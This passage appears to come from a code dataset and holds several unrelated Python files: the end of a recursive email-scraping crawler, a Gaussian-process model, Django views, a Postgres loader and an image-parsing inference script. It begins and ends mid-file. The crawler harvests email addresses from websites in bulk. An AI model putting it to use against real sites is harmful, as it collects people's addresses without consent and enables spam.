timeout=10)\n if len(request.history) > 0:\n target = request.url\n if VERBOSE:\n print(\"Redirected to: \" + request.url)\n request.connection.close()\n if VERBOSE:\n print(\"\\nProcessing: \" + target)\n email_addresses = set()\n links = list()\n soup = loader.load_and_soup(target)\n email_addresses = get_promising_mails(soup)\n links = get_promising_urls(soup, target)\n except Exception as e:\n print(\"Error: \" + target + \":\")\n print(repr(e).split('(')[0])\n if VERBOSE:\n tb = traceback.format_exc()\n print(tb)\n email_addresses = set()\n links = set()\n return email_addresses, links\n\n\ndef strip_emails(results):\n emails = set()\n for email in results:\n if email.startswith(\"mailto:\"):\n emails.add(email[7:])\n elif email.startswith(\"mailto*\"):\n emails.add(email[7:])\n elif email.startswith(\"regex:\"):\n emails.add(email[6:])\n else:\n emails.add(email)\n return emails\n\n\ndef crawl(target, depth, done_urls):\n current_link = target\n emails = set()\n\n if int(depth) > 0:\n new_email_addresses, new_links = process_url(current_link)\n emails = emails.union(set(new_email_addresses))\n done_urls = done_urls.union(set([current_link]))\n for link in new_links:\n if link not in done_urls:\n done_urls, new_emails = crawl(link, int(depth) - 1, done_urls)\n emails = emails.union(new_emails)\n emails = strip_emails(emails)\n if len(emails) > 5:\n return done_urls, emails\n return done_urls, emails\n\n\ndef filter_results_from_regex(emails):\n # filter results for regex errors\n results = []\n for e1 in emails:\n counter = 0\n for e2 in emails:\n if e2.startswith(e1):\n counter += 1\n if counter == 1:\n 
results.append(e1)\n else:\n if VERBOSE:\n print(e1 + \" seems to be a regex-related error.\")\n return results\n\n\ndef Main():\n global VERBOSE\n\n parser = argparse.ArgumentParser()\n parser.add_argument(\n \"depth\", help=\"Depth of the crawling process. Should not be > 3\", type=int)\n parser.add_argument(\"-u\", \"--url\", help=\"URL of a site.\", type=str)\n parser.add_argument(\n \"-l\", \"--list\", help=\"List of sites. Should be a PrivacyScore-Export.\", type=str)\n parser.add_argument(\"-v\", \"--verbose\", help=\"Verbose mode\",\n action=\"store_true\", default=False)\n args = parser.parse_args()\n\n VERBOSE = args.verbose\n\n if args.url:\n loader.init()\n done_urls, emails = crawl(args.url, args.depth, set())\n if VERBOSE:\n print(\"\\nResult:\")\n\n results = filter_results_from_regex(emails)\n for email in sorted(results):\n print(email)\n loader.cleanup()\n if args.list:\n loader.init()\n VERBOSE = False\n hits = 0\n file = open(args.list, \"r\")\n text = file.read()\n lines = text.split(\"\\n\")\n for i in range(1, len(lines) - 1):\n split_me = lines[i].split(\";\")\n url = split_me[0]\n done_urls, emails = crawl(url, args.depth, set())\n print(str(i) + \"/\" + str(len(lines) - 2) +\n \"\\t\" + url + \"\\t\" + str(len(emails)))\n if len(emails) > 0:\n hits += 1\n results = filter_results_from_regex(emails)\n for email in sorted(results):\n print(\"\\t\\t\" + email)\n else:\n print(\"\\tNO HITS! TODO!\")\n print(str(hits) + \" of \" + str(len(lines) - 2))\n loader.cleanup()\n\n\nif __name__ == \"__main__\":\n Main()\n","sub_path":"mail-crawler.py","file_name":"mail-crawler.py","file_ext":"py","file_size_in_byte":8468,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"221279351","text":"import math\nimport torch\nimport gpytorch\nimport numpy as np\nimport statsmodels.api as sm\nfrom tqdm import tqdm\nfrom torch.utils.data import TensorDataset, DataLoader\nfrom gpytorch.models import ApproximateGP\nfrom gpytorch.variational import CholeskyVariationalDistribution\nfrom gpytorch.variational import VariationalStrategy\n\nclass GPModel(ApproximateGP):\n \"\"\" Class for GPyTorch model.\n\n Attributes\n ----------\n mean_module : gpytorch Mean\n Module to calculate mean.\n covar_module : gpytorch Kernel\n Module to calculate covariance.\n \"\"\"\n def __init__(self, inducing_points,nu=2.5,length_scale=1,length_scale_bounds=(1e-5,1e5)):\n \"\"\" Create a GPModel object.\n\n Parameters\n ----------\n inducing_points: array\n Array of inducing points.\n length_scale: float, default=1\n Length scale parameter of Matern kernel.\n length_scale_bounds: pair of floats >= 0 or 'fixed', default=(1e-5, 1e5)\n The lower and upper bound on length_scale. 
If set to 'fixed', ‘length_scale’ cannot be changed during hyperparameter tuning.\n nu: float, default=2.5\n Nu parameter of Matern kernel.\n \n Raises\n ------\n ValueError\n Invalid argument for length_scale_bounds\n \"\"\"\n variational_distribution = CholeskyVariationalDistribution(inducing_points.size(0))\n variational_strategy = VariationalStrategy(self, inducing_points, variational_distribution, learn_inducing_locations=True)\n super(GPModel, self).__init__(variational_strategy)\n\n self.mean_module = gpytorch.means.ConstantMean()\n\n if length_scale_bounds == 'fixed':\n constraint = gpytorch.constraints.Interval(length_scale - 0.001,length_scale + 0.001)\n elif isinstance(length_scale_bounds,tuple):\n constraint = gpytorch.constraints.Interval(length_scale_bounds[0],length_scale_bounds[1])\n else:\n raise ValueError('Invalid argument for length_scale_bounds.')\n prior = gpytorch.priors.NormalPrior(length_scale,1)\n self.covar_module = gpytorch.kernels.ScaleKernel(gpytorch.kernels.MaternKernel(nu=nu,lengthscale_prior=prior,lengthscale_constraint=constraint))\n\n def forward(self, x):\n \"\"\" Calculate forward pass of GPModel.\n\n Parameters\n ----------\n x: Tensor\n Data tensor.\n \n Returns\n -------\n MultivariateNormal object\n \"\"\"\n mean_x = self.mean_module(x)\n covar_x = self.covar_module(x)\n return gpytorch.distributions.MultivariateNormal(mean_x, covar_x)\n\n\nclass SVGP:\n \"\"\" Class for SVGP model.\n\n Attributes\n ----------\n train_loader: pytorch DataLoader\n DataLoader for training data.\n test_loader: pytorch DataLoader\n DataLoader for test data.\n inducing_points: array\n Subset of training data to use as inducing points.\n n_train: int\n Number of training points.\n n_test: int\n Number of test points.\n model: GPModel\n Instance of GPModel class.\n likelihood: gpytorch Likelihood\n Gaussian likelihood function.\n loss: list\n Loss for each epoch of training.\n \"\"\"\n def __init__(self,X_train,X_test,y_train,y_test,n_inducing=500,batch_size=256,nu=2.5,length_scale=1,length_scale_bounds=(1e-5,1e5)):\n \"\"\" Create a SVGP object.\n\n Parameters\n ----------\n X_train: array\n Training confounds with categorical values dummy encoded.\n X_test: array\n Test confounds with categorical values dummy encoded.\n y_train: array\n Training score/response variable.\n y_test: array\n Test score/response variable.\n length_scale: float, default=1\n Length scale parameter of Matern kernel.\n length_scale_bounds: pair of floats >= 0 or 'fixed', default=(1e-5, 1e5)\n The lower and upper bound on length_scale. 
If set to 'fixed', ‘length_scale’ cannot be changed during hyperparameter tuning.\n nu: float, default=2.5\n Nu parameter of Matern kernel.\n batch_size: int, default=256\n Batch size for SVGP model training and prediction.\n n_inducing: int, default=500\n Number of inducing points for SVGP model.\n \"\"\"\n # Get data in torch format\n train_x = torch.from_numpy(X_train).contiguous()\n test_x = torch.from_numpy(X_test).double().contiguous()\n train_y = torch.from_numpy(y_train).contiguous()\n test_y = torch.from_numpy(y_test).double().contiguous()\n\n # Create datasets\n train_dataset = TensorDataset(train_x, train_y)\n test_dataset = TensorDataset(test_x, test_y)\n\n # Create dataloaders\n self.train_loader = DataLoader(train_dataset, batch_size=batch_size, shuffle=True)\n self.test_loader = DataLoader(test_dataset, batch_size=batch_size, shuffle=False)\n inducing_idx = np.random.choice(np.array(range(train_x.shape[0])),size=n_inducing)\n self.inducing_points = train_x[inducing_idx, :]\n self.n_train = train_y.size(0)\n self.n_test = test_y.size(0)\n\n self.model = GPModel(inducing_points=self.inducing_points,nu=nu,length_scale=length_scale,length_scale_bounds=length_scale_bounds).double()\n self.likelihood = gpytorch.likelihoods.GaussianLikelihood()\n self.likelihood.initialize(noise=torch.std(train_x))\n\n if torch.cuda.is_available():\n self.model = self.model.cuda()\n self.likelihood = self.likelihood.cuda()\n \n self.loss = []\n \n def train(self,num_epochs=20):\n \"\"\" Trains the SVGP model.\n\n Parameters\n ----------\n num_epochs: int\n Number of epochs (full passes through dataset) to train for.\n \"\"\"\n self.model.train()\n self.likelihood.train()\n\n optimizer = torch.optim.Adam([{'params': self.model.parameters()},{'params': self.likelihood.parameters()}], lr=0.01)\n\n # Loss object. 
We're using the VariationalELBO\n mll = gpytorch.mlls.VariationalELBO(self.likelihood, self.model, num_data=self.n_train)\n\n epochs_iter = tqdm(range(num_epochs), desc=\"Epoch\")\n for i in epochs_iter:\n # Within each iteration, we will go over each minibatch of data\n minibatch_iter = tqdm(self.train_loader, desc=\"Minibatch\", leave=False)\n for x_batch, y_batch in minibatch_iter:\n optimizer.zero_grad()\n output = self.model(x_batch)\n loss = -mll(output, y_batch)\n minibatch_iter.set_postfix(loss=loss.item())\n loss.backward()\n optimizer.step()\n self.loss.append(loss.item())\n \n def predict(self):\n \"\"\" Predict from SVGP model.\n\n Returns\n ----------\n array\n Model predictions (mean of predictive distribution).\n array\n Model uncertainty (standard deviation of predictive distribution).\n \"\"\"\n self.model.eval()\n self.likelihood.eval()\n\n mean = torch.tensor([0.])\n sigma = torch.tensor([0.])\n with torch.no_grad():\n for x_batch, y_batch in self.test_loader:\n preds = self.likelihood(self.model(x_batch)) # get likelihood variance + posterior GP variance\n mean = torch.cat([mean, preds.mean.cpu()])\n sigma = torch.cat([sigma, torch.sqrt(preds.variance.cpu())])\n mean = mean[1:]\n sigma = sigma[1:]\n return mean, sigma","sub_path":"pynm/models/approx.py","file_name":"approx.py","file_ext":"py","file_size_in_byte":7633,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"292255901","text":"from valuate import *\n\n\n# 返回结构格式\nresult_map = pd.DataFrame(columns=['intent', 'intent_source', 'predict_price'])\nresult_map['intent'] = pd.Series(gl.INTENT_TYPE)\nresult_map['intent_source'] = pd.Series(gl.INTENT_TYPE_CAN)\n\ncondition_evaluate_map = pd.read_csv(path + 'predict/condition_evaluate.csv')\n\n\n","sub_path":"valuate/predict/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":315,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"281788506","text":"from django.conf import settings\nfrom django.shortcuts import redirect, render, resolve_url, get_object_or_404\nfrom django.contrib.auth.forms import UserCreationForm\nfrom django.contrib.auth.decorators import login_required\n# from django.contrib.auth.models import User\nfrom django.contrib.auth import get_user_model\nfrom django.views.generic import CreateView\nfrom django.contrib.auth import login as auth_login\nfrom .forms import SignupForm, EditForm\nfrom play.models import Game\n\n# def signup(request):\n# if request.method == 'POST':\n# form = UserCreationForm(request.POST)\n# if form.is_valid():\n# user = form.save()\n# auth_login(request, user)\n# next_url = request.GET.get('next') or 'profile'\n# return redirect(next_url)\n# else:\n# form = UserCreationForm()\n# return render(request, 'accounts/signup.html', {\n# 'form' : form,\n# })\nclass SignupView(CreateView):\n model = get_user_model()\n form_class = SignupForm\n template_name = 'accounts/signup.html'\n def get_success_url(self):\n next_url = self.request.GET.get('next') or 'profile'\n return resolve_url(next_url)\n def form_valid(self, SignupForm):\n user = SignupForm.save()\n auth_login(self.request, user)\n return redirect(self.get_success_url())\nsignup = SignupView.as_view()\n\n@login_required\ndef profile(request):\n return render(request, 'accounts/profile.html')\n\n@login_required\ndef profile_edit(request):\n current_user = request.user\n user = get_object_or_404(get_user_model(), username=current_user)\n if request.method == 
'POST':\n form = EditForm(\n request.POST,\n instance=user,\n )\n if form.is_valid():\n user = form.save()\n auth_login(request, user)\n next_url = request.GET.get('next') or 'profile'\n return redirect(next_url)\n else:\n form = EditForm(\n initial={\n 'nickname': current_user.nickname\n },\n # When editing, you should set initial, not placeholder!\n )\n return render(request, 'accounts/profile_edit.html', {\n 'form': form,\n })\n\n@login_required()\ndef mygame(request):\n request.session['user_id'] = request.user.id\n games_passive = Game.objects.filter(defender=request.user.id)\n games_active = Game.objects.filter(attacker=request.user.id)\n context = {\n 'games_p':games_passive,\n 'games_a':games_active\n }\n return render(request, 'accounts/mygame.html', context)","sub_path":"accounts/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2603,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"433984975","text":"import psycopg2\n\nfrom loader import SqlBaseLoader\nfrom core_sql import Sql\n\nclass PostgresSql(Sql):\n @classmethod\n def table_exists(cls, table_name):\n schema, table = cls.parse_table_name(table_name)\n return \"\"\"\n SELECT EXISTS (\n SELECT 1\n FROM information_schema.tables\n WHERE table_schema = '{schema}'\n AND table_name = '{table_name}'\n );\"\"\".format(schema=schema, table_name=table)\n\n @classmethod\n def parse_table_name(cls, table_name):\n splits = [word for word in table_name.split('.') if word]\n if len(splits) == 1:\n schema, table = 'public', splits[0]\n elif len(splits) == 2:\n schema, table = splits\n else:\n raise ValueError('Table name should be in the format <table> or <schema>.<table>')\n return schema, table\n\n @classmethod\n def escape_table_name(cls, table_name):\n schema, table = cls.parse_table_name(table_name)\n return '\"{schema}\".\"{table_name}\"'.format(\n schema=schema,\n table_name=table\n )\n\n @classmethod\n def create_table(cls, table_name, columns):\n schema, table = cls.parse_table_name(table_name)\n create_query = super(PostgresSql, cls).create_table(table_name, columns)\n if schema != 'public':\n return \"\"\"\n CREATE SCHEMA IF NOT EXISTS \"{schema}\";\n {create_query};\n \"\"\".format(schema=schema, create_query=create_query)\n else:\n return create_query\n\n\nclass PostgresLoader(SqlBaseLoader):\n def __init__(self, connection):\n super().__init__(connection=connection)\n\n def connect(self, connection):\n return psycopg2.connect(connection)\n\n @property\n def sql(self):\n return PostgresSql\n","sub_path":"mETL/transforms/load-csv/postgres_loader.py","file_name":"postgres_loader.py","file_ext":"py","file_size_in_byte":1847,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"63263951","text":"# Flask\nfrom flask import Flask\n# Sqlite\nfrom sqlalchemy import create_engine\n# Views\nfrom views import app_views\n# Utils\nfrom dotenv import load_dotenv \nfrom os import getenv\n\nload_dotenv(verbose=True)\ndb_connect = create_engine('sqlite:///mock_data_db/mock_data.db')\n# Instance Class\napp = Flask(__name__)\napp.register_blueprint(app_views)\n\n\nif __name__ == '__main__':\n host = '0.0.0.0'\n port = '5000'\n if getenv('API_HOST'):\n host = getenv('API_HOST')\n if getenv('API_PORT'):\n port = getenv('API_PORT')\n\n print(getenv('API_PORT'))\n\n app.run(host=host, port=port, 
threaded=True)\n","sub_path":"api/v1/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":615,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"386316028","text":"import argparse\r\nimport numpy as np\r\nimport torch\r\n# torch.multiprocessing.set_start_method(\"spawn\", force=True)\r\nfrom torch.utils import data\r\nfrom networks.CE2P import Res_Deeplab\r\nfrom dataset.datasets import InferDataSet\r\nimport os\r\nimport torchvision.transforms as transforms\r\nfrom copy import deepcopy\r\nfrom utils.transforms import transform_parsing\r\nfrom utils.utils import get_lip_palette\r\nfrom PIL import Image\r\nfrom time import time\r\n# from tqdm import tqdm\r\n\r\nDATA_DIRECTORY = '/ssd1/liuting14/Dataset/LIP/'\r\nDATA_LIST_PATH = './dataset/list/lip/valList.txt'\r\n# IGNORE_LABEL = 255\r\nNUM_CLASSES = 20\r\nSNAPSHOT_DIR = './snapshots/'\r\nINPUT_SIZE = '473,473'\r\nPALETTE = get_lip_palette() \r\n\r\ndef get_arguments():\r\n \"\"\"Parse all the arguments provided from the CLI.\r\n \r\n Returns:\r\n A list of parsed arguments.\r\n \"\"\"\r\n parser = argparse.ArgumentParser(description=\"CE2P Network\")\r\n parser.add_argument(\"--save-dir\", type=str,\r\n help=\"Path for saving inference results.\")\r\n parser.add_argument(\"--data-dir\", type=str,\r\n help=\"Path to the directory containing the PASCAL VOC dataset.\")\r\n parser.add_argument('--image-ext', type=str, default='jpg',\r\n help='image file name extension (default: jpg)')\r\n parser.add_argument(\"--list-path\", type=str,\r\n help=\"Path to a txt file containing image names for inference.\")\r\n parser.add_argument(\"--batch-size\", type=int, default=1,\r\n help=\"Number of images sent to the network in one step.\")\r\n parser.add_argument(\"--num_workers\", type=int, default=0,\r\n help=\"Number of cpu workers for dataloader.\")\r\n # parser.add_argument(\"--ignore-label\", type=int, default=IGNORE_LABEL,\r\n # help=\"The index of the label to ignore during the training.\")\r\n parser.add_argument(\"--num-classes\", type=int, default=NUM_CLASSES,\r\n help=\"Number of classes to predict (including background).\")\r\n parser.add_argument(\"--restore-from\", type=str,\r\n help=\"Where to restore model parameters from.\")\r\n parser.add_argument(\"--gpu\", type=str, default='0',\r\n help=\"choose gpu device.\")\r\n parser.add_argument(\"--input-size\", type=str, default=INPUT_SIZE,\r\n help=\"Comma-separated string with height and width of images.\")\r\n parser.add_argument(\"--mirror\", action=\"store_true\", help=\"combined with mirror results\")\r\n\r\n return parser.parse_args()\r\n\r\ndef transform_flip_pred(pred_flip):\r\n \"\"\" transform prediction from flipped images to be combined with normal prediction\r\n\r\n Args:\r\n pred_flip: BxCxHxW\r\n \"\"\"\r\n pred_flip_copy = pred_flip.copy()\r\n right_idx = [15, 17, 19]\r\n left_idx = [14, 16, 18]\r\n for i in range(len(right_idx)):\r\n pred_flip[:,right_idx[i],:,:] = pred_flip_copy[:,left_idx[i],:,:]\r\n pred_flip[:,left_idx[i],:,:] = pred_flip_copy[:,right_idx[i],:,:]\r\n\r\n pred_flip = pred_flip[:,:,:,::-1].copy()\r\n return pred_flip\r\n\r\ndef infer(model, valloader, input_size, num_samples, gpus, save_dir, mirror=False):\r\n \"\"\"\r\n Args:\r\n mirror: combined with mirror results(only support single gpu)\r\n \"\"\"\r\n model.eval()\r\n\r\n interp = torch.nn.Upsample(size=(input_size[0], input_size[1]), mode='bilinear', align_corners=True)\r\n current_t = time()\r\n with torch.no_grad():\r\n for index, 
batch in enumerate(valloader):\r\n image, meta = batch\r\n num_images = image.size(0)\r\n if index % 10 == 0:\r\n print('%d processed in %.1fs' % (index * num_images, time()-current_t))\r\n current_t = time()\r\n\r\n # extract information for recovering prediction\r\n c = meta['center'].numpy()\r\n s = meta['scale'].numpy()\r\n h = meta['height'].numpy()\r\n w = meta['width'].numpy()\r\n n = meta['name']\r\n if mirror:\r\n image_flip = torch.from_numpy(image.numpy()[:,:,:,::-1].copy())\r\n image_all = torch.cat([image, image_flip])\r\n outputs = model(image_all.cuda())\r\n else:\r\n outputs = model(image.cuda())\r\n if gpus > 1:\r\n raise NotImplementedError(\"inference on multi-GPU has not been implemented\") # TODO: multi-GPU\r\n # for output in outputs:\r\n # parsing = output[0][-1]\r\n # nums = len(parsing)\r\n # parsing = interp(parsing).data.cpu().numpy()\r\n # parsing = parsing.transpose(0, 2, 3, 1) # NCHW NHWC\r\n # parsing_preds[idx:idx + nums, :, :] = np.asarray(np.argmax(parsing, axis=3), dtype=np.uint8)\r\n else:\r\n parsing = outputs[0][-1]\r\n parsing = interp(parsing).data.cpu().numpy()\r\n if mirror:\r\n pred_ori, pred_flip = np.split(parsing, 2, axis=0)\r\n pred_flip = transform_flip_pred(pred_flip)\r\n parsing = np.mean([pred_ori, pred_flip], axis=0)\r\n parsing = parsing.transpose(0, 2, 3, 1) # NCHW->NHWC\r\n parsing_pred = np.asarray(np.argmax(parsing, axis=3), dtype=np.uint8)\r\n assert len(parsing_pred)==len(s)==len(c)==len(h)==len(w)==len(n)\r\n transform_and_save(parsing_pred, s, c, h, w, n, input_size, save_dir)\r\n\r\ndef transform_and_save(pred_batch, scales, centers, heights, widths, names, input_size, save_dir):\r\n for i in range(len(pred_batch)):\r\n pred_out = pred_batch[i]\r\n h, w, s, c = heights[i], widths[i], scales[i], centers[i]\r\n pred = transform_parsing(pred_out, c, s, w, h, input_size=input_size)\r\n output_im = Image.fromarray(pred)\r\n output_im.putpalette(PALETTE)\r\n output_im.save(os.path.join(save_dir, names[i]+'.png'))\r\n\r\n\r\ndef main():\r\n \"\"\"Create the model and start the evaluation process.\"\"\"\r\n args = get_arguments()\r\n # options\r\n os.environ[\"CUDA_VISIBLE_DEVICES\"]=args.gpu\r\n gpus = [int(i) for i in args.gpu.split(',')]\r\n h, w = map(int, args.input_size.split(','))\r\n input_size = (h, w)\r\n # load data \r\n normalize = transforms.Normalize(mean=[0.485, 0.456, 0.406],\r\n std=[0.229, 0.224, 0.225])\r\n transform = transforms.Compose([\r\n transforms.ToTensor(),\r\n normalize,\r\n ])\r\n\r\n lip_dataset = InferDataSet(args.data_dir, args.image_ext, crop_size=input_size, transform=transform)\r\n num_samples = len(lip_dataset)\r\n valloader = data.DataLoader(lip_dataset, batch_size=args.batch_size * len(gpus), \r\n num_workers=args.num_workers, shuffle=False, pin_memory=True)\r\n # load model\r\n model = Res_Deeplab(num_classes=args.num_classes)\r\n restore_from = args.restore_from\r\n state_dict = model.state_dict().copy()\r\n state_dict_old = torch.load(restore_from)\r\n\r\n for key, nkey in zip(state_dict_old.keys(), state_dict.keys()):\r\n if key != nkey:\r\n # remove the 'module.' 
in the 'key'\r\n state_dict[key[7:]] = deepcopy(state_dict_old[key])\r\n else:\r\n state_dict[key] = deepcopy(state_dict_old[key])\r\n\r\n model.load_state_dict(state_dict)\r\n model.eval()\r\n model.cuda()\r\n # infer and save result\r\n os.makedirs(args.save_dir, exist_ok=True)\r\n infer(model, valloader, input_size, num_samples, len(gpus), args.save_dir, args.mirror)\r\n print(\"Done.\")\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","sub_path":"infer_mirror.py","file_name":"infer_mirror.py","file_ext":"py","file_size_in_byte":7606,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"603442427","text":"# anchorFunc\n\"\"\"This function determines the tag position matrix\"\"\"\n\nimport numpy as np\nimport sys\nimport itertools as itt\nimport math\nimport copy\nimport matplotlib.pyplot as plt\n\ndef coordinateFunc(ancMat, anc2DPos, tagMat, tagPos, actualPositions):\n\n\n # Determine number of anchors\n ancNum, _ = ancMat.shape\n \n # Define temporary tag position matrix\n tempTagPos = np.array([[0.00, 0.00],[0.00, 0.00],[0.00, 0.00]])\n\n # Create all 3 anchor combinations\n ancList = list(range(0,ancNum))\n ancIts = [x for x in itt.combinations(ancList, 3) ]\n lenIts = len(ancIts)\n\n\n # Initialize arVec which contains aspect ratios (figures of merit) for equilateral triangles\n arVec = np.zeros((lenIts, 1))\n\n\n # Loop over the ancIts list and find the most equilateral triangle\n for j in range(0,lenIts):\n triIts = [x for x in itt.combinations(ancIts[j], 2) ]\n\n d1 = ancMat[triIts[0][0], triIts[0][1]]\n d2 = ancMat[triIts[1][0], triIts[1][1]]\n d3 = ancMat[triIts[2][0], triIts[2][1]]\n\n s = 0.5*(d1 + d2 + d3)\n arVec[j,0] = (d1*d2*d3)/(4*(s-d1)*(s-d2)*(s-d3))\n \n\n # Now we choose the most equilateral triangle\n sortArgs = np.argsort(np.absolute(arVec),0)\n \n # And we also create vectors of its cyclic permutations\n refTri1 = list(ancIts[sortArgs[0][0]])\n refTri2 = [refTri1[1],refTri1[2],refTri1[0]]\n refTri3 = [refTri1[2],refTri1[0],refTri1[1]]\n\n\n # Now we will declare that the first point in refTri1 is the origin\n # We will then declare that the second point lies on the x-axis\n anc2DPos[refTri1[1],:] = np.array([ancMat[refTri1[0]][refTri1[1]],0])\n \n\n\n # Now we determine the third point relative to the other two\n d1 = ancMat[refTri1[0]][refTri1[1]]\n d2 = ancMat[refTri1[1]][refTri1[2]]\n d3 = ancMat[refTri1[2]][refTri1[0]]\n\n\n # Now calculate the angles in the triangle\n cosTheta1 = (d1**2 + d3**2 - d2**2 )/(2*d1*d3)\n theta1 = math.acos(cosTheta1)\n \n\n # Using trig we find the third anchor\n anc2DPos[refTri1[2],:] = np.array([d3*cosTheta1,d3*np.sin(theta1)])\n \n\n # We have now found 3 anchors\n ancsFound = 3\n ancsFoundList = list(refTri1)\n \n \n # Using these cyclic permutations we can define a coordinate transformation matrix\n x2 = anc2DPos[refTri2[1], :] - anc2DPos[refTri2[0], :]\n x2 = x2/np.linalg.norm(x2)\n y2 = np.array([-x2[1],x2[0]])\n\n R2 = np.zeros((2,2))\n R2[:,0] = x2\n R2[:,1] = y2\n \n\n # And we define one more coordinate transformation\n x3 = anc2DPos[refTri3[1], :] - anc2DPos[refTri3[0], :]\n x3 = x3/np.linalg.norm(x3)\n y3 = np.array([-x3[1],x3[0]])\n\n R3 = np.zeros((2,2))\n R3[:,0] = x3\n R3[:,1] = y3\n #R3 = np.transpose(R3)\n\n\n # We still have to find these anchors\n pointsToFind = [x for x in ancList if x not in refTri1]\n\n\n # Now we loop over the remaining points\n # Remember d1 = distance from anchor[0] to anchor[1]\n for j in pointsToFind:\n\n # Calculate the coordinates 
using all three orientations \n # or \"view points\". We do this because if a point is collinear with the x-axis\n # then the triangle is degenerate and we cannot resolve the reflection ambiguity\n d01 = ancMat[refTri1[0]][refTri1[1]]\n d0p = ancMat[refTri1[0]][j]\n d1p = ancMat[refTri1[1]][j]\n res1 = anc2DPos[refTri1[2],:]\n xp1 = ((d01**2 +d0p**2 - d1p**2)/(2*d01))\n ypm1 = np.array([np.sqrt(d0p**2 - xp1**2),-np.sqrt(d0p**2 - xp1**2)])\n\n d01 = ancMat[refTri2[0]][refTri2[1]]\n d0p = ancMat[refTri2[0]][j]\n d1p = ancMat[refTri2[1]][j]\n res2 = anc2DPos[refTri2[2],:]\n xp2 = ((d01**2 +d0p**2 - d1p**2)/(2*d01))\n ypm2 = np.array([np.sqrt(d0p**2 - xp2**2),-np.sqrt(d0p**2 - xp2**2)])\n\n d01 = ancMat[refTri3[0]][refTri3[1]]\n d0p = ancMat[refTri3[0]][j]\n d1p = ancMat[refTri3[1]][j]\n res3 = anc2DPos[refTri3[2],:]\n xp3 = ((d01**2 +d0p**2 - d1p**2)/(2*d01))\n ypm3 = np.array([np.sqrt(d0p**2 - xp3**2),-np.sqrt(d0p**2 - xp3**2)])\n\n \n \n # Transform the other values back into the original frame\n # We must transport the [xp2,ypm2] and [xp3,ypm3] points to the new origin\n xy1 = np.array(([xp1,xp1],[ypm1[0],ypm1[1]]))\n xy2 = np.dot(R2,np.array(([xp2,xp2],[ypm2[0],ypm2[1]]))) + np.array(([anc2DPos[refTri2[0]][0],anc2DPos[refTri2[0]][0]],[anc2DPos[refTri2[0]][1],anc2DPos[refTri2[0]][1]]))\n xy3 = np.dot(R3,np.array(([xp3,xp3],[ypm3[0],ypm3[1]]))) + np.array(([anc2DPos[refTri3[0]][0],anc2DPos[refTri3[0]][0]],[anc2DPos[refTri3[0]][1],anc2DPos[refTri3[0]][1]])) \n\n\n \n # Now we must use the reflection resolver to make sure we have the correct solution\n distTol = 1\n \n # Check using LCS 1\n trueDist = ancMat[refTri1[2]][j]\n dist1 = np.linalg.norm(anc2DPos[refTri1[2],:] - xy1[:, 0])\n dist2 = np.linalg.norm(anc2DPos[refTri1[2],:] - xy1[:, 1])\n if trueDist - dist1 < distTol:\n soln1 = xy1[:, 0] \n elif trueDist - dist2 < distTol:\n soln1 = xy1[:, 1] \n else:\n soln1 = np.nan\n\n # Check using LCS 2\n trueDist = ancMat[refTri2[2]][j]\n dist1 = np.linalg.norm(anc2DPos[refTri2[2],:] - xy2[:, 0])\n dist2 = np.linalg.norm(anc2DPos[refTri2[2],:] - xy2[:, 1])\n if trueDist - dist1 < distTol:\n soln2 = xy2[:, 0] \n elif trueDist - dist2 < distTol:\n soln2 = xy2[:, 1] \n else:\n soln2 = np.nan \n\n \n # Check using LCS 3\n trueDist = ancMat[refTri3[2]][j]\n dist1 = np.linalg.norm(anc2DPos[refTri3[2],:] - xy3[:, 0])\n dist2 = np.linalg.norm(anc2DPos[refTri3[2],:] - xy3[:, 1])\n if trueDist - dist1 < distTol:\n soln3 = xy3[:, 0] \n elif trueDist - dist2 < distTol:\n soln3 = xy3[:, 1] \n else:\n soln3 = np.nan \n \n ###########################################################\n # BIG ASSUMPTION HERE: NEED TO ADD ROBUSTNESS\n ###########################################################\n # For now let's enter soln3 into the anc2DPos matrix\n anc2DPos[j, :] = soln3\n\n ###############################################################\n # NOW LOCATE THE TAGS ON THE FIELD\n ###############################################################\n\n # Now we locate the tags and use their positions to fix the coordinate system\n \n for j in range(0,3):\n\n # Calculate the coordinates using all three orientations \n # or \"view points\". 
We do this because if a point is collinear with the x-axis\n # then the triangle is degenerate and we cannot resolve the reflection ambiguity\n d01 = ancMat[refTri1[0]][refTri1[1]]\n d0p = tagMat[j][refTri1[0]]\n d1p = tagMat[j][refTri1[1]] \n xp1 = ((d01**2 +d0p**2 - d1p**2)/(2*d01))\n ypm1 = np.array([np.sqrt(d0p**2 - xp1**2),-np.sqrt(d0p**2 - xp1**2)])\n\n d01 = ancMat[refTri2[0]][refTri2[1]]\n d0p = tagMat[j][refTri2[0]]\n d1p = tagMat[j][refTri2[1]] \n xp2 = ((d01**2 +d0p**2 - d1p**2)/(2*d01))\n ypm2 = np.array([np.sqrt(d0p**2 - xp2**2),-np.sqrt(d0p**2 - xp2**2)]) \n\n d01 = ancMat[refTri3[0]][refTri3[1]]\n d0p = tagMat[j][refTri3[0]]\n d1p = tagMat[j][refTri3[1]] \n xp3 = ((d01**2 +d0p**2 - d1p**2)/(2*d01))\n ypm3 = np.array([np.sqrt(d0p**2 - xp3**2),-np.sqrt(d0p**2 - xp3**2)])\n \n # Transform the other values back into the original frame\n # We must transport the [xp2,ypm2] and [xp3,ypm3] points to the new origin\n xy1 = np.array(([xp1,xp1],[ypm1[0],ypm1[1]]))\n xy2 = np.dot(R2,np.array(([xp2,xp2],[ypm2[0],ypm2[1]]))) + np.array(([anc2DPos[refTri2[0]][0],anc2DPos[refTri2[0]][0]],[anc2DPos[refTri2[0]][1],anc2DPos[refTri2[0]][1]]))\n xy3 = np.dot(R3,np.array(([xp3,xp3],[ypm3[0],ypm3[1]]))) + 